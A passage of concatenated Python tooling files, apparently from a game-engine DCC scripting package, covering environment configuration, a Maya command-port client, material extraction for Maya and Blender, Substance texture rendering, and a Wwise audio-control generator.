Path(PATH_DCCSI_LOG_PATH.format(LY_DEV=_LY_DEV, LY_PROJECT=_LY_PROJECT)))) os.environ["DYNACONF_DCCSI_LOG_PATH"] = str(_DCCSI_LOG_PATH) # hard checks if not _LY_BIN_PATH.exists(): raise Exception('LY_BIN_PATH does NOT exist: {0}'.format(_LY_BIN_PATH)) else: # adding to sys.path apparently doesn't work for .dll locations like Qt os.environ['PATH'] = _LY_BIN_PATH.as_posix() + os.pathsep + os.environ['PATH'] _LOGGER.info('Dynaconf config.py ... DONE') # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # settings.setenv() # doing this will add the additional DYNACONF_ envars def get_config_settings(setup_ly_pyside=False): """Convenience method to set and retreive settings directly from module.""" from dynaconf import settings if setup_ly_pyside: init_ly_pyside(settings.LY_DEV) settings.setenv() return settings # --- END ----------------------------------------------------------------- ########################################################################### # Main Code Block, runs this script as main (testing) # ------------------------------------------------------------------------- if __name__ == '__main__': """Run this file as main""" _LOG_LEVEL = int(10) # same as _logging.DEBUG _LOGGER = azpy.initialize_logger(_PACKAGENAME, log_to_file=True, default_log_level=_LOG_LEVEL) from dynaconf import settings # not using fstrings in this module because it might run in py2.7 (maya) _LOGGER.info('DCCSI_GDEBUG: {}'.format(settings.DCCSI_GDEBUG)) _LOGGER.info('DCCSI_DEV_MODE: {}'.format(settings.DCCSI_DEV_MODE)) _LOGGER.info('DCCSI_LOGLEVEL: {}'.format(settings.DCCSI_LOGLEVEL)) _LOGGER.info('OS_FOLDER: {}'.format(settings.OS_FOLDER)) _LOGGER.info('LY_PROJECT: {}'.format(settings.LY_PROJECT)) _LOGGER.info('LY_PROJECT_PATH: {}'.format(settings.LY_PROJECT_PATH)) _LOGGER.info('LY_DEV: {}'.format(settings.LY_DEV)) _LOGGER.info('LY_BUILD_PATH: {}'.format(settings.LY_BUILD_PATH)) _LOGGER.info('LY_BIN_PATH: {}'.format(settings.LY_BIN_PATH)) _LOGGER.info('DCCSI_LOG_PATH: {}'.format(settings.DCCSI_LOG_PATH)) _LOGGER.info('DCCSI_CONFIG_PATH: {}'.format(settings.DCCSI_CONFIG_PATH)) _LOGGER.info('DCCSIG_PATH: {}'.format(settings.DCCSIG_PATH)) _LOGGER.info('DCCSI_PYTHON_LIB_PATH: {}'.format(settings.DCCSI_PYTHON_LIB_PATH)) _LOGGER.info('DDCCSI_PY_BASE: {}'.format(settings.DDCCSI_PY_BASE)) # To Do: These should ONLY be set for Lumberyard and non-DCC environments # They will most likely cause Qt/PySide DCC apps to fail # or hopefully they can be overridden for DCC envionments # that provide their own Qt dlls and Pyside2 #_LOGGER.info('QTFORPYTHON_PATH: {}'.format(settings.QTFORPYTHON_PATH)) #_LOGGER.info('QT_PLUGIN_PATH: {}'.format(settings.QT_PLUGIN_PATH)) init_ly_pyside(settings.LY_DEV) # init lumberyard Qt/PySide2 # from dynaconf import settings # <-- no need to reimport settings.setenv() # doing this will add/set the additional DYNACONF_ envars #_LOGGER.info('QTFORPYTHON_PATH: {}'.format(settings.QTFORPYTHON_PATH)) _LOGGER.info('LY_BIN_PATH: {}'.format(settings.LY_BIN_PATH)) _LOGGER.info('QT_PLUGIN_PATH: {}'.format(settings.QT_PLUGIN_PATH)) _LOGGER.info('QT_QPA_PLATFORM_PLUGIN_PATH: {}'.format(settings.QT_QPA_PLATFORM_PLUGIN_PATH)) _LOGGER.info('DCCSI_PYSIDE2_TOOLS: {}'.format(settings.DCCSI_PYSIDE2_TOOLS)) test_pyside2() # test PySide2 access with a pop-up button ``` #### File: Python/legacy_asset_converter/test_command_port.py ```python import socket import pickle import traceback import sys # BUFFER_SIZE = 4096 # port = 20201 # # if len(sys.argv) > 1: # port = sys.argv[1] # # def SendCommand(target_command): # maya_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # maya_socket.connect(('localhost', port)) # # try: # maya_socket.send("import maya.cmds as cmds".encode()) # data = maya_socket.recv(BUFFER_SIZE) # maya_socket.send("cmds.polySphere()".encode()) # data = maya_socket.recv(BUFFER_SIZE) # # # This is a workaround for replacing "null bytes" and converting # # return information as a list (as opposed to a string) # result = eval(data.decode().replace('\x00', '')) # print(result[0]) # except Exception as e: # print ('Connection Failed: {}'.format(e)) # finally: # maya_socket.close() # # # # maya.send('import maya.cmds as mc; mc.polyCube()') # # maya.close() # # if __name__=='__main__': # target_command = "import maya.cmds as mc; mc.polySphere();" # SendCommand(target_command) #Port Number 20201 # MayaVersion + 0 (Mel) or 1 (Python) # # import maya.cmds as mc # mc.commandPort(name=":20201", sourceType="python") # # # His user setup has this in it: # # if not mc.about(batch=True): # mc.commandPort(name=":20200", sourceType="mel") # mc.commandPort(name=":20201", sourceType="python") class MayaClient(object): PORT = 20201 BUFFER_SIZE = 4096 def __init__(self): self.maya_socket = None self.port = self.__class__.PORT def connect(self, port=-1): if port >= 0: self.port = port try: self.maya_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.maya_socket.connect(('localhost', self.PORT)) except: traceback.print_exc() return False return True def disconnect(self): try: self.maya_socket.close() except: traceback.print_exc() return False return True def send(self, cmd): try: self.maya_socket.sendall(cmd.encode()) except: traceback.print_exc() return None return self.recv() def recv(self): try: data = self.maya_socket.recv(MayaClient.BUFFER_SIZE) except: traceback.print_exc() return None return data.decode().replace('\x00', '') ################## # COMMANDS ##### ################## def echo(self, text): cmd = "eval(\"'{}'\")".format(text) return self.send(cmd) def new_file(self): cmd = "cmds.file(new=True, force=True)" return self.send(cmd) def create_primitive(self, shape): cmd = '' if shape == 'sphere': cmd += 'cmds.polySphere()' elif shape == 'cube': cmd += 'cmds.polyCube()' else: print('Invalid Shape: {}'.format(shape)) return None result = self.send(cmd) return eval(result) def translate(self, node, translation): cmd = "cmds.setAttr('{0}.translate', {1}, {2}, {3})".format(node, *translation) if __name__ == '__main__': maya_client = MayaClient() if maya_client.connect(): print('Connected successfully') print('Echo: {}'.format(maya_client.echo('hello world'))) file_name = maya_client.new_file() print(file_name) nodes = maya_client.create_primitive('sphere') print(nodes) maya_client.translate(nodes[0], [0, 10, 0]) nodes = maya_client.create_primitive('cube') print(nodes) if maya_client.disconnect(): print('Disconnected successfully') else: print('Failed to connect') if __name__ == "__main__": maya_client = MayaClient() ``` #### File: Python/maya_dcc_materials/minspect.py ```python import pymel.core as pmc import sys import types def syspath(): print 'sys.path:' for p in sys.path: print ' ' + p def info(obj): """Prints information about the object.""" lines = ['Info for %s' % obj.name(), 'Attributes:'] # Get the name of all attributes for a in obj.listAttr(): lines.append(' ' + a.name()) lines.append('MEL type: %s' % obj.type()) lines.append('MRO:') lines.extend([' ' + t.__name__ for t in type(obj).__mro__]) result = '\n'.join(lines) print result def _is_pymel(obj): try: # (1) module = obj.__module__ # (2) except AttributeError: # (3) try: module = obj.__name__ # (4) except AttributeError: return None # (5) return module.startswith('pymel') # (6) def _py_to_helpstr(obj): if isinstance(obj, basestring): return 'search.html?q=%s' % (obj.replace(' ', '+')) if not _is_pymel(obj): return None if isinstance(obj, types.ModuleType): return ('generated/%(module)s.html#module-%(module)s' % dict(module=obj.__name__)) if isinstance(obj, types.MethodType): return ('generated/classes/%(module)s/' '%(module)s.%(typename)s.html' '#%(module)s.%(typename)s.%(methname)s' % dict( module=obj.__module__, typename=obj.im_class.__name__, methname=obj.__name__)) if isinstance(obj, types.FunctionType): return ('generated/functions/%(module)s/' '%(module)s.%(funcname)s.html' '#%(module)s.%(funcname)s' % dict( module=obj.__module__, funcname=obj.__name__)) if not isinstance(obj, type): obj = type(obj) return ('generated/classes/%(module)s/' '%(module)s.%(typename)s.html' '#%(module)s.%(typename)s' % dict( module=obj.__module__, typename=obj.__name__)) def test_py_to_helpstr(): def dotest(obj, ideal): result = _py_to_helpstr(obj) assert result == ideal, '%s != %s' % (result, ideal) dotest('maya rocks', 'search.html?q=maya+rocks') dotest(pmc.nodetypes, 'generated/pymel.core.nodetypes.html' '#module-pymel.core.nodetypes') dotest(pmc.nodetypes.Joint, 'generated/classes/pymel.core.nodetypes/' 'pymel.core.nodetypes.Joint.html' '#pymel.core.nodetypes.Joint') dotest(pmc.nodetypes.Joint(), 'generated/classes/pymel.core.nodetypes/' 'pymel.core.nodetypes.Joint.html' '#pymel.core.nodetypes.Joint') dotest(pmc.nodetypes.Joint().getTranslation, 'generated/classes/pymel.core.nodetypes/' 'pymel.core.nodetypes.Joint.html' '#pymel.core.nodetypes.Joint.getTranslation') dotest(pmc.joint, 'generated/functions/pymel.core.animation/' 'pymel.core.animation.joint.html' '#pymel.core.animation.joint') dotest(object(), None) dotest(10, None) dotest([], None) dotest(sys, None) def test_py_to_helpstrFAIL(): assert 1 == 2, '1 != 2' import webbrowser # (1) HELP_ROOT_URL = ('http://help.autodesk.com/cloudhelp/2018/ENU/Maya-Tech-Docs/PyMel/')# (2) def pmhelp(obj): # (3) """Gives help for a pymel or python object. If obj is not a PyMEL object, use Python's built-in `help` function. If obj is a string, open a web browser to a search in the PyMEL help for the string. Otherwise, open a web browser to the page for the object. """ tail = _py_to_helpstr(obj) if tail is None: help(obj) # (4) else: webbrowser.open(HELP_ROOT_URL + tail) # (5) if __name__ == '__main__': test_py_to_helpstr() print 'Tests ran successfully.' ``` #### File: PythonTools/DCC_Material_Converter/blender_materials.py ```python import bpy import collections import json def get_shader_information(): """ Queries all materials and corresponding material attributes and file textures in the Blender scene. :return: """ # TODO - link file texture location to PBR material plugs- finding it difficult to track down how this is achieved # in the Blender Python API documentation and/or in forums materials_count = 1 shader_types = get_blender_shader_types() materials_dictionary = {} for target_mesh in [o for o in bpy.data.objects if type(o.data) is bpy.types.Mesh]: material_information = collections.OrderedDict(DccApplication='Blender', AppliedMesh=target_mesh, SceneName=bpy.data.filepath, MaterialAttributes={}, FileConnections={}) for target_material in target_mesh.data.materials: material_information['MaterialName'] = target_material.name shader_attributes = {} shader_file_connections = {} for node in target_material.node_tree.nodes: socket = node.inputs[0] print('NODE: {}'.format(node)) print('Socket: {}'.format(socket)) for material_input in node.inputs: attribute_name = material_input.name try: attribute_value = material_input.default_value print('Name: [{}] [{}] ValueType ::::::> {}'.format(attribute_name, attribute_value, type(attribute_value))) material_information['MaterialAttributes'].update({attribute_name: str(attribute_value)}) except Exception as e: pass print('\n') if node.type == 'TEX_IMAGE': material_information['FileConnections'].update({str(node): str(node.image.filepath)}) if node.name in shader_types.keys(): material_information['MaterialType'] = shader_types[node.name] # material_information['MaterialAttributes'] = shader_attributes materials_dictionary['Material_{}'.format(materials_count)] = material_information materials_count += 1 print('_________________________________________________________________\n') return materials_dictionary def get_blender_shader_types(): """ This returns all the material types present in the Blender scene :return: """ shader_types = {} ddir = lambda data, filter_str: [i for i in dir(data) if i.startswith(filter_str)] get_nodes = lambda cat: [i for i in getattr(bpy.types, cat).category.items(None)] cycles_categories = ddir(bpy.types, "NODE_MT_category_SH_NEW") for cat in cycles_categories: if cat == 'NODE_MT_category_SH_NEW_SHADER': for node in get_nodes(cat): shader_types[node.label] = node.nodetype return shader_types materials_dictionary = get_shader_information() #print('Materials Dictionary:') #print(materials_dictionary) #parsed = json.loads(str(materials_dictionary)) #print(json.dumps(parsed, indent=4, sort_keys=True)) ``` #### File: PythonTools/DCC_Material_Converter/maya_materials.py ```python from PySide2 import QtCore import maya.standalone maya.standalone.initialize(name='python') import maya.cmds as mc import collections import logging import json import sys import os for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) logging.basicConfig(level=logging.INFO, format='%(name)s - %(levelname)s - %(message)s', datefmt='%m-%d %H:%M', filename='output.log', filemode='w') class MayaMaterials(QtCore.QObject): def __init__(self, files_list, materials_count, parent=None): super(MayaMaterials, self).__init__(parent) self.files_list = files_list self.current_scene = None self.materials_dictionary = {} self.materials_count = int(materials_count) self.get_material_information() def get_material_information(self): """ Main entry point for the material information extraction. Because this class is run in Standalone mode as a subprocess, the list is passed as a string- some parsing/measures need to be taken in order to separate values that originated as a list before passed. :return: A dictionary of all of the materials gathered. Sent back to main UI through stdout """ for target_file in file_list: self.current_scene = os.path.abspath(target_file.replace('\'', '')) mc.file(self.current_scene, open=True, force=True) self.set_material_descriptions() json.dump(self.materials_dictionary, sys.stdout) @staticmethod def get_materials(target_mesh): """ Gathers a list of all materials attached to each mesh's shader :param target_mesh: The target mesh to pull attached material information from. :return: List of unique material values attached to the mesh passed as an argument. """ shading_group = mc.listConnections(target_mesh, type='shadingEngine') materials = mc.ls(mc.listConnections(shading_group), materials=1) return list(set(materials)) @staticmethod def get_shader(material_name): """ Convenience function for obtaining the shader that the specified material (as an argument) is attached to. :param material_name: Takes the material name as an argument to get associated shader object :return: """ connections = mc.listConnections(material_name, type='shadingEngine')[0] shader_name = '{}.surfaceShader'.format(connections) shader = mc.listConnections(shader_name)[0] return shader def get_shader_information(self, shader, material_mesh): """ Helper function for extracting shader/material attributes used to form the DCC specific dictionary of found material values for conversion. :param shader: The target shader object to analyze :param material_mesh: The material mesh needs to be passed to search for textures attached to it. :return: Complete set (in the form of two dictionaries) of file connections and material attribute values """ shader_file_connections = {} materials = self.get_materials(material_mesh) for material in materials: material_files = [x for x in mc.listConnections(material, plugs=1, source=1) if x.startswith('file')] for file_name in material_files: file_texture = mc.getAttr('{}.fileTextureName'.format(file_name.split('.')[0])) if os.path.basename(file_texture).split('.')[-1] != 'dds': key_name = mc.listConnections(file_name, plugs=1, source=1)[0] shader_file_connections[key_name] = file_texture shader_attributes = {} for shader_attribute in mc.listAttr(shader, s=True, iu=True): try: shader_attributes[str(shader_attribute)] = str(mc.getAttr('{}.{}'.format(shader, shader_attribute))) except Exception as e: logging.error('MayaAttributeError: {}'.format(e)) return shader_file_connections, shader_attributes def set_material_dictionary(self, material_name, material_type, material_mesh): """ When a unique material has been found, this creates a dictionary entry with all relevant material values. This includes material attributes as well as attached file textures. Later in the process this information is leveraged when creating the Lumberyard material definition. :param material_name: The name attached to the material :param material_type: Specific type of material (Arnold, Stingray, etc.) :param material_mesh: Mesh that the material is applied to :return: """ self.materials_count += 1 shader = self.get_shader(material_name) shader_file_connections, shader_attributes = self.get_shader_information(shader, material_mesh) material_dictionary = collections.OrderedDict(MaterialName=material_name, MaterialType=material_type, DccApplication='Maya', AppliedMesh=material_mesh, FileConnections=shader_file_connections, SceneName=str(self.current_scene), MaterialAttributes=shader_attributes) material_name = 'Material_{}'.format(self.materials_count) self.materials_dictionary[material_name] = material_dictionary logging.info('\n\n:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n' 'MATERIAL DEFINITION: {} \n' ':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n{}'.format( self.materials_dictionary[material_name]['MaterialType'], json.dumps(self.materials_dictionary[material_name], indent=4))) def set_material_descriptions(self): """ This function serves as the clearinghouse for all analyzed materials passing through the system. It will determine whether or not the found material has already been processed, or if it needs to be added to the final material dictionary. In the event that an encountered material has already been processed, this function creates a register of all meshes it is applied to in the 'AppliedMesh' attribute. :return: """ scene_geo = mc.ls(v=True, geometry=True) for target_mesh in scene_geo: material_list = self.get_materials(target_mesh) for material_name in material_list: material_type = mc.nodeType(material_name) if material_type != 'lambert': material_listed = [x for x in self.materials_dictionary if self.materials_dictionary[x]['MaterialName'] == material_name] if not material_listed: self.set_material_dictionary(str(material_name), str(material_type), str(target_mesh)) else: mesh_list = self.materials_dictionary[material_name].get('AppliedMesh') if not isinstance(mesh_list, list): self.materials_dictionary[str(material_name)]['AppliedMesh'] = [mesh_list, target_mesh] else: mesh_list.append(target_mesh) # ++++++++++++++++++++++++++++++++++++++++++++++++# # Maya Specific Shader Mapping # # ++++++++++++++++++++++++++++++++++++++++++++++++# file_list = sys.argv[1:-1] count = sys.argv[-1] instance = MayaMaterials(file_list, count) ``` #### File: Substance/builder/sbsar_utils.py ```python import os import sys import site import subprocess import logging as _logging # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # set up global space, logging etc. from azpy.env_bool import env_bool from azpy.constants import ENVAR_DCCSI_GDEBUG from azpy.constants import ENVAR_DCCSI_DEV_MODE # we boostrap access to some lib site-packages from dynaconf import settings from pathlib import Path _G_DEBUG = env_bool(ENVAR_DCCSI_GDEBUG, settings.DCCSI_GDEBUG) _DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, settings.DCCSI_DEV_MODE) _MODULENAME = 'DCCsi.SDK.substance.builder.sbsar_utils' _LOGGER = _logging.getLogger(_MODULENAME) _LOGGER.debug('Starting up: {0}.'.format({_MODULENAME})) # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # substance automation toolkit (aka pysbs) # To Do: manage with dynaconf environment from azpy.constants import PATH_SAT_INSTALL_PATH _SAT_INSTALL_PATH = Path(PATH_SAT_INSTALL_PATH).resolve() site.addsitedir(str(_SAT_INSTALL_PATH)) # 'install' is the folder I created # Susbstance import pysbs.batchtools as pysbs_batch import pysbs.context as _pysbs_context _PYSBS_CONTEXT = _pysbs_context.Context() # ------------------------------------------------------------------------- # -------------------------------------------------------------------------- def cook_sbsar(input_sbs, cook_output_path): """ Doc String""" input_sbs = Path(input_sbs).resolve() cook_output_path = Path(cook_output_path).resolve() if not cook_output_path.exists(): try: cook_output_path.mkdir() except: _LOGGER.warning('Could not mkdir: {}'.format(cook_output_path)) output_name = input_sbs.stem pysbs_batch.sbscooker(quiet=True, inputs=str(input_sbs), includes=_PYSBS_CONTEXT.getDefaultPackagePath(), alias=_PYSBS_CONTEXT.getUrlAliasMgr().getAllAliases(), output_path=str(cook_output_path), output_name=output_name, compression_mode=2).wait() new_file = Path(cook_output_path, output_name + '.sbsar').resolve() if new_file.exists(): return new_file # -------------------------------------------------------------------------- # -------------------------------------------------------------------------- def info_sbsar(input_path): """ Doc String""" sbsar_info = [] in_file = Path(input_path).resolve() input_n_output = pysbs_batch.sbsrender_info(input=str(in_file), stdout=subprocess.PIPE) for info in input_n_output.stdout.read().splitlines(): sbsar_info.append(info.decode('utf-8')) return sbsar_info # -------------------------------------------------------------------------- # -------------------------------------------------------------------------- def output_info(cook_output_path, output_name, output_type): """ Doc String""" info_lists = [] input_file = Path(cook_output_path, output_name + '.sbsar').resolve() input_n_output = pysbs_batch.sbsrender_info(input=str(input_file), stdout=subprocess.PIPE) for info_list in input_n_output.stdout.read().splitlines(): info_lists.append(info_list.decode('utf-8')) tex_maps, params, output_size, presets, inputs = [], [], [], [], [] for info_list in info_lists: if 'OUTPUT' in info_list: tex_maps.append(info_list.split(' ')[3]) elif 'INPUT $' in info_list: params.append(info_list.split(' ')[3:]) elif 'PRESET' in info_list: presets.append(info_list.split('PRESET ')[1]) elif 'INPUT' in info_list and not '$' in info_list: inputs.append(info_list.split(' ')[3:]) output_info = {'tex_maps': tex_maps, 'params': params, 'output_size': output_size, 'presets': presets, 'inputs': inputs} return output_info[output_type] # To Do: Make preset a optional argument. # -------------------------------------------------------------------------- # -------------------------------------------------------------------------- def render_sbsar(cook_output_path, output_texture_type, sbsar_name, render_to_output_path, use_preset, output_size, random_seed): """ Render textures maps from SBSAR""" # _tex_output = ['diffuse', 'basecolor', 'normal'] # print(_tex_output) cook_output_path = Path(cook_output_path).resolve() texture_path = Path(render_to_output_path).resolve() sbsar_file = Path(cook_output_path, sbsar_name + '.sbsar').resolve() if output_info(cook_output_path, sbsar_name, 'presets'): if use_preset == -1: preset_base = '_' pysbs_batch.sbsrender_render(inputs=str(sbsar_file), # input_graph=_inputGraphPath, input_graph_output=str(output_texture_type), output_path=str(texture_path), output_name=sbsar_name + preset_base + '{outputNodeName}', output_format='tif', set_value=['$outputsize@{},{}'.format(output_size, output_size), '$randomseed@{}'.format(random_seed)], no_report=True, verbose=True ).wait() else: preset_name = output_info(cook_output_path, sbsar_name, 'presets')[use_preset] preset_base = '_' pysbs_batch.sbsrender_render(inputs=str(sbsar_file), # input_graph=_inputGraphPath, input_graph_output=str(output_texture_type), output_path=str(texture_path), output_name=sbsar_name + preset_base + preset_name.replace(' ', '') + '_{outputNodeName}', output_format='tif', set_value=['$outputsize@{},{}'.format(output_size, output_size), '$randomseed@{}'.format(random_seed)], use_preset=preset_name, no_report=True, verbose=True ).wait() else: pysbs_batch.sbsrender_render(inputs=str(sbsar_file), # input_graph=_inputGraphPath, input_graph_output=str(output_texture_type), output_path=str(texture_path), output_name=sbsar_name + '_{outputNodeName}', output_format='tif', set_value=['$outputsize@{},{}'.format(output_size, output_size), '$randomseed@{}'.format(random_seed)], no_report=True, verbose=True ).wait() # -------------------------------------------------------------------------- ########################################################################### # Main Code Block, runs this script as main (testing) # ------------------------------------------------------------------------- if __name__ == "__main__": """Run this file as main""" # --------------------------------------------------------------------- # Defining CONSTANTS # To Do: shouldn't need this _SYNTH_ENV_DICT (replace with dynaconf config) from azpy import synthetic_env _SYNTH_ENV_DICT = synthetic_env.stash_env() from azpy.constants import ENVAR_DCCSIG_PATH from azpy.constants import ENVAR_LY_PROJECT_PATH # grab a specific path from the base_env _PATH_DCCSI = _SYNTH_ENV_DICT[ENVAR_DCCSIG_PATH] # use DCCsi as the project path for this test _LY_PROJECT_PATH = _PATH_DCCSI _PROJECT_ASSETS_PATH = Path(_LY_PROJECT_PATH, 'Assets').resolve() _PROJECT_MATERIALS_PATH = Path(_PROJECT_ASSETS_PATH, 'Materials').resolve() # this will combine two parts into a single path (object) # It also returnd the fixed-up version (norm) _PATH_OUTPUT = Path(_PROJECT_MATERIALS_PATH, 'Fabric') _PATH_INPUT_SBS = Path(_PROJECT_MATERIALS_PATH, 'Fabric', 'fabric.sbsar') # --------------------------------------------------------------------- _LOGGER.debug("{0} :: if __name__ == '__main__':".format(_MODULENAME)) _LOGGER.debug('_SYNTH_ENV_DICT: {}'.format(_SYNTH_ENV_DICT)) _LOGGER.info('presets: {}'.format(output_info(_PATH_OUTPUT, _PATH_INPUT_SBS.stem, 'presets'))) _LOGGER.info('params: {}'.format(output_info(_PATH_OUTPUT, _PATH_INPUT_SBS.stem, 'params'))) _LOGGER.info('inputs: {}'.format(output_info(_PATH_OUTPUT, _PATH_INPUT_SBS.stem, 'inputs'))) _LOGGER.info('tex_maps: {}'.format(output_info(_PATH_OUTPUT, _PATH_INPUT_SBS.stem, 'tex_maps'))) _LOGGER.info(info_sbsar(Path(_PATH_INPUT_SBS))) new_file = cook_sbsar(_PATH_INPUT_SBS, Path(_PATH_OUTPUT, '.tests')) if new_file: _LOGGER.info('Cooked out: {}'.format(new_file)) render_sbsar(cook_output_path=Path(_PATH_OUTPUT, '.tests'), output_texture_type='basecolor', sbsar_name=_PATH_INPUT_SBS.stem, render_to_output_path=Path(_PATH_OUTPUT, '.tests'), use_preset=-1, output_size=256, random_seed=1001) # remove the logger del _LOGGER # ---- END --------------------------------------------------------------- ``` #### File: builder/ui/PySide2_qtextedit_stdout.py ```python import sys from PySide2.QtCore import QProcess, Signal, Slot, QTextCodec from PySide2.QtGui import QTextCursor from PySide2.QtWidgets import QApplication, QPlainTextEdit from PySide2.QtCore import QTimer class ProcessOutputReader(QProcess): produce_output = Signal(str) def __init__(self, parent=None): super().__init__(parent=parent) # merge stderr channel into stdout channel self.setProcessChannelMode(QProcess.MergedChannels) # prepare decoding process' output to Unicode self._codec = QTextCodec.codecForLocale() self._decoder_stdout = self._codec.makeDecoder() # only necessary when stderr channel isn't merged into stdout: # self._decoder_stderr = codec.makeDecoder() self.readyReadStandardOutput.connect(self._ready_read_standard_output) # only necessary when stderr channel isn't merged into stdout: # self.readyReadStandardError.connect(self._ready_read_standard_error) @Slot() def _ready_read_standard_output(self): raw_bytes = self.readAllStandardOutput() text = self._decoder_stdout.toUnicode(raw_bytes) self.produce_output.emit(text) # only necessary when stderr channel isn't merged into stdout: # @Slot() # def _ready_read_standard_error(self): # raw_bytes = self.readAllStandardError() # text = self._decoder_stderr.toUnicode(raw_bytes) # self.produce_output.emit(text) class MyConsole(QPlainTextEdit): def __init__(self, parent=None): super().__init__(parent=parent) self.setReadOnly(True) self.setMaximumBlockCount(10000) # limit console to 10000 lines self._cursor_output = self.textCursor() @Slot(str) def append_output(self, text): self._cursor_output.insertText(text) self.scroll_to_last_line() def scroll_to_last_line(self): cursor = self.textCursor() cursor.movePosition(QTextCursor.End) cursor.movePosition(QTextCursor.Up if cursor.atBlockStart() else QTextCursor.StartOfLine) self.setTextCursor(cursor) def output_text(self, text): self._cursor_output.insertText(text) self.scroll_to_last_line() # create the application instance app = QApplication(sys.argv) # create a process output reader reader = ProcessOutputReader() # create a console and connect the process output reader to it console = MyConsole() reader.produce_output.connect(console.append_output) reader.start('python', ['-u', 'C:\\dccapi\\dev\\Gems\\DccScriptingInterface\\LyPy\\si_substance\\builder\\watchdog' '\\__init__.py', 'C:\\Users\\chunghao\\Documents\\Allegorithmic\\Substance Designer' '\\sbsar']) # start the process console.show() # make the console visible # app.exec_() # run the PyQt main loop timer = QTimer() timer.timeout.connect(lambda: None) timer.start(100) sys.exit(app.exec_()) ``` #### File: Tools/WwiseATLGen/wwise_atl_gen_tool.py ```python from argparse import ArgumentParser from operator import attrgetter from xml.dom import minidom from xml.etree import ElementTree import os import sys __version__ = '0.1.0' __copyright__ = 'Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution..' all_events = set() all_parameters = set() all_preloads = set() all_auxbusses = set() all_switches = dict() all_states = dict() SWITCH_TYPE = 0 STATE_TYPE = 1 def get_options(): parser = ArgumentParser(description='Process soundbank metadata and generate ATL xml data for Lumberyard.\n' 'Path arguments can be relative to the working directory of this script.') parser.add_argument('--bankPath', required=True, help='Root path where to look for banks, e.g. <Project>\\Sounds\\wwise') parser.add_argument('--atlPath', required=True, help='Output path for the ATL controls, e.g. <Project>\\libs\\gameaudio\\wwise') parser.add_argument('--atlName', required=True, help='Name of the output xml file, e.g. generated_controls.xml') parser.add_argument('--autoLoad', required=False, action='store_true', help='Whether "AutoLoad" setting should be applied to new SoundBanks. Consecutive runs of ' 'this script on the same output file will preserve any "AutoLoad" settings that were ' 'there before. This flag will apply "AutoLoad" to any SoundBanks that appear to be new.') parser.add_argument('--printDebug', required=False, action='store_true', help='Print out the parsed Wwise data to stdout') options = parser.parse_args() if os.path.exists(options.atlPath): print('ATL File Path: {}'.format(os.path.join(options.atlPath, options.atlName))) else: sys.exit('--atlPath {}: Path does not exist!'.format(options.atlPath)) if os.path.exists(options.bankPath): print('Bank Root Path: {}'.format(options.bankPath)) else: sys.exit('--bankPath {}: Path does not exist!'.format(options.bankPath)) print() return options class ATLType: def __init__(self, name, path): def fix_path(_path): """ Modifies the format of a path that came from a Wwise .txt file 1) Converts all backslashes to forwardslashes 2) Cuts off the last part of the path, which is equal to name 3) Trims the slash from the beginning of the path :param _path: Input path string :return: Modified path string """ _path = _path.replace('\\', '/') # HACK: if _path.endswith(name): _path = os.path.dirname(_path) if len(_path) > 0 and _path[0] == '/': return _path[1:] else: return _path self.name = name self.path = fix_path(path) self.name_attr = 'atl_name' self.path_attr = 'path' self.element = __class__.__name__ def __str__(self): return '{}/{}'.format(self.path, self.name) def __eq__(self, other): return self.name == other.name and self.path == other.path def __hash__(self): return hash((self.name, self.path)) def attach_xml(self, node): return ElementTree.SubElement(node, self.element, attrib={self.name_attr: self.name, self.path_attr: self.path}) class ATLEnvironment(ATLType): def __init__(self, name, path): super().__init__(name, path) self.element = __class__.__name__ self.auxbus = WwiseAuxBus(self.name) def attach_xml(self, node): atl_env = super().attach_xml(node) self.auxbus.attach_xml(atl_env) class ATLTrigger(ATLType): def __init__(self, name, path): super().__init__(name, path) self.element = __class__.__name__ self.event = WwiseEvent(self.name) def attach_xml(self, node): atl_trigger = super().attach_xml(node) self.event.attach_xml(atl_trigger) class ATLRtpc(ATLType): def __init__(self, name, path): super().__init__(name, path) self.element = __class__.__name__ self.param = WwiseRtpc(self.name) def attach_xml(self, node): atl_rtpc = super().attach_xml(node) self.param.attach_xml(atl_rtpc) class ATLSwitch(ATLType): def __init__(self, name, path): super().__init__(name, path) self.element = __class__.__name__ self.states = dict() def attach_xml(self, node): atl_switch = super().attach_xml(node) for switch_state in sorted(self.states.values(), key=attrgetter('name')): switch_state.attach_xml(atl_switch) class ATLSwitchState(ATLType): def __init__(self, name, switch_name, wwise_type): super().__init__(name, switch_name) # Here the 'path' will denote the parent ATLSwitch name. # The ATLSwitch has it's own 'path' member so that data is still reachable. self.wwise_type = wwise_type self.element = __class__.__name__ if self.wwise_type == SWITCH_TYPE: self.state = WwiseSwitch(self.name, switch_name) elif self.wwise_type == STATE_TYPE: self.state = WwiseState(self.name, switch_name) def __eq__(self, other): return self.name == other.name and self.path == other.path and self.wwise_type == other.wwise_type def attach_xml(self, node): atl_switch_state = ElementTree.SubElement(node, self.element, attrib={self.name_attr: self.name}) if self.state: self.state.attach_xml(atl_switch_state) class ATLPreloadRequest(ATLType): def __init__(self, name, path, is_loc, is_autoload): super().__init__(name, path) self.element = __class__.__name__ self.autoload_attr = 'atl_type' self.autoload = is_autoload self.param = WwiseFile(self.name + '.bnk', is_loc) def attach_xml(self, node): atl_preload = super().attach_xml(node) if self.autoload: atl_preload.set(self.autoload_attr, 'AutoLoad') self.param.attach_xml(atl_preload) class WwiseType: def __init__(self, name): self.name = name self.name_attr = 'wwise_name' self.element = __class__.__name__ def attach_xml(self, node): return ElementTree.SubElement(node, self.element, attrib={self.name_attr: self.name}) class WwiseAuxBus(WwiseType): def __init__(self, name): super().__init__(name) self.element = __class__.__name__ class WwiseEvent(WwiseType): def __init__(self, name): super().__init__(name) self.element = __class__.__name__ class WwiseRtpc(WwiseType): def __init__(self, name): super().__init__(name) self.element = __class__.__name__ class WwiseValue(WwiseType): def __init__(self, name): super().__init__(name) self.element = __class__.__name__ class WwiseSwitch(WwiseType): def __init__(self, name, path): super().__init__(path) # This inits with 'path', the WwiseValue 